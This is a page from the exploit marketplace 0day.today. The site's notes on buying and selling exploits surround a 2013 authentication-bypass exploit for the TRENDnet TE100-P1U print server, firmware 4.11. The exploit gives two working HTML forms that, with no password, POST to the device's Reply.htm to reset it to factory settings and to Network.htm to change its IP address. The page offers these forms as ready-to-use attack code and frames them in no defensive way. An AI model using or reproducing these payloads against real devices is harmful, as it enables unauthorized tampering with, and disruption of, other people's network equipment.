0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TRENDnet TE100-P1U Authentication Bypass Vulnerability
############################################################# # # Exploit Title: TRENDnet TE100-P1U Print Server Firmware 4.11 Authentication Bypass Vulnerability # Date: 2013/6/20 # Exploit Author: Chako # Firmware Version: 4.11 # Tested on: Windows 7 ############################################################# Description: ===================== A remote authentication bypass vulnerability affects TRENDnet TE100-P1U Print Server. This issue is due to a failure of the application to validate authentication credentials when processing print server configuration change requests. An attacker could reset print server to factory sttings or changeing its IP address without password security check. Exploit: ===================== 1)Reset Print Server To Factory Settings <form action="http://IP/Reply.htm" method="POST"> <table border="0" cellpadding="3" cellspacing="0" width="100%"> <tbody><tr><td class="headerbg">Factory Reset</td></tr> </tbody></table> <table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%"> <tbody><tr><td height="50" bgcolor="#F0F0F0">&nbps;<span class="bluetextbold">Do you want to restore Print Server to factory default setting?</span></td></tr> </tbody></table><br>&nbps; <input name="Factory" value=" Yes " type="submit" width="60"> </form> 1)Change Print Server IP Address <form action="http://IP/Network.htm" method="POST"> <table border="0" cellpadding="3" cellspacing="0" width="100%"> <tbody><tr><td class="headerbg">Change IP Address</td></tr> </tbody></table> <table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%"> <tbody><tr> <td class="bluetextbold" align="right" bgcolor="#C5CEDA" valign="top" width="150">&nbps;IP Address:</td> <td bgcolor="#F0F0F0" valign="top"> <table border="0"> <tbody><tr><td> <input name="IP_ASSIGN" value="1" type="radio">Manually Assign <table border="0" cellpadding="3" cellspacing="0"> <tbody><tr> <td width="20"></td><td>IP Address</td> <td>:&nbps;&nbps;<input size="18" name="IP_Address" value="192.168.1.110" type="text"></td> </tr> <tr> <td></td><td>Subnet Mask</td> <td>:&nbps;&nbps;<input size="18" name="Subnet_Mask" value="255.255.255.0" type="text"></td> </tr> <tr> <td></td><td>Default Gateway</td> <td>:&nbps;&nbps;<input size="18" name="Default_Gateway" value="192.168.1.254" type="text"></td> </tr> </tbody></table> </td></tr> </tbody></table> </td> </tr> </tbody></table> <table border="0" cellpadding="5" cellspacing="1" width="100%"> <tbody><tr> <td height="50" width="149">&nbps;</td> <td width="355">&nbps;<input name="Config2" value=" Save " type="submit" width="80">&nbps;&nbps;<input value="Cancel" type="reset" width="80"></td> </tr> </tbody></table> </form> # 0day.today [2024-11-16] #